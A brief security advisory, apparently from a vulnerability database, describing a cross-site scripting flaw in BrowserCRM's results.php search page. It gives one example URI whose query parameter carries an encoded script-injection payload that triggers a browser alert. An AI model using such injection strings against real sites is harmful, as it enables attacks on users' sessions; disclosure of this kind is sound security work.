BrowserCRM Results.PHP Cross-Site Scripting Vulnerability

BrowserCRM Results.PHP Cross-Site Scripting Vulnerability

An exploit is not required.

An example URI has been provided:

http://www.example.com/modules/Search/results.php?query=%3CIMG+SRC%3Djavascript%3Aalert%28String.fromCharCode%2888%2C83%2C83%29%29%3E